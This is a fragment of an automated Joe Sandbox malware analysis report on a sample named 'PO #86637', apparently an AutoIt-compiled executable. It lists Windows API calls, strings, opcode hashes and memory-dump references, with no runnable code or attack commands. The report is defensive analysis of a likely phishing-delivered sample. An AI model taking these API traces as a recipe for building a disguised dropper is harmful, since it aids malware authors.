                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                      • API String ID: 1038674560-2734436370
                      • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                      • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                      • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                      • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                      • LoadStringW.USER32(00000000), ref: 00434060
                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                      • LoadStringW.USER32(00000000), ref: 00434078
                      • _wprintf.LIBCMT ref: 004340A1
                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                      Strings
                      • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: HandleLoadModuleString$Message_wprintf
                      • String ID: %s (%d) : ==> %s: %s %s
                      • API String ID: 3648134473-3128320259
                      • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                      • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                      • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                      • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                      APIs
                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                      • __lock.LIBCMT ref: 00417981
                        • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                        • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                        • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                      • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                      • __lock.LIBCMT ref: 004179A2
                      • ___addlocaleref.LIBCMT ref: 004179C0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                      • String ID: KERNEL32.DLL$pI
                      • API String ID: 637971194-197072765
                      • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                      • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                      • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                      • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove$_malloc
                      • String ID:
                      • API String ID: 1938898002-0
                      • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                      • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                      • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                      • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                      APIs
                        • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                      • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                      • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                        • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$BrushCreateDeleteObjectSolid
                      • String ID:
                      • API String ID: 3771399671-0
                      • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                      • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                      • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                      • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                      APIs
                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                      • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                      • _memmove.LIBCMT ref: 0044B555
                      • _memmove.LIBCMT ref: 0044B578
                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                      • String ID:
                      • API String ID: 2737351978-0
                      • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                      • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                      • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                      • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                      APIs
                      • ___set_flsgetvalue.LIBCMT ref: 0041523A
                      • __calloc_crt.LIBCMT ref: 00415246
                      • __getptd.LIBCMT ref: 00415253
                      • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                      • _free.LIBCMT ref: 0041529E
                      • __dosmaperr.LIBCMT ref: 004152A9
                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                      • String ID:
                      • API String ID: 3638380555-0
                      • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                      • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                      • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                      • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 0046C96E
                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Variant$Copy$ClearErrorInitLast
                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                      • API String ID: 3207048006-625585964
                      • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                      • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                      • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                      • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                      APIs
                      • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                      • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                      • gethostbyname.WSOCK32(?), ref: 004655A6
                      • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                      • _memmove.LIBCMT ref: 004656CA
                      • GlobalFree.KERNEL32(00000000), ref: 0046575C
                      • WSACleanup.WSOCK32 ref: 00465762
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                      • String ID:
                      • API String ID: 2945290962-0
                      • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                      • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                      • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                      • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                      APIs
                      • GetSystemMetrics.USER32(0000000F), ref: 00440527
                      • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                      • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                      • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                      • String ID:
                      • API String ID: 1457242333-0
                      • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                      • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                      • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                      • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                      APIs
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ConnectRegistry_memmove_wcslen
                      • String ID:
                      • API String ID: 15295421-0
                      • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                      • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                      • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                      • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                      APIs
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                      • _wcstok.LIBCMT ref: 004675B2
                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                      • _wcscpy.LIBCMT ref: 00467641
                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                      • _wcslen.LIBCMT ref: 00467793
                      • _wcslen.LIBCMT ref: 004677BD
                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                      • String ID: X
                      • API String ID: 780548581-3081909835
                      • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                      • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                      • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                      • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                      APIs
                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                      • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                      • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                      • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                      • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                      • CloseFigure.GDI32(?), ref: 0044751F
                      • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                      • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                      • String ID:
                      • API String ID: 4082120231-0
                      • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                      • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                      • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                      • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                      APIs
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                      • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                      • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                      • String ID:
                      • API String ID: 2027346449-0
                      • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                      • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                      • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                      • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                      APIs
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                      • GetMenu.USER32 ref: 0047A703
                      • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                      • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                      • _wcslen.LIBCMT ref: 0047A79E
                      • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                      • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                      • String ID:
                      • API String ID: 3257027151-0
                      • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
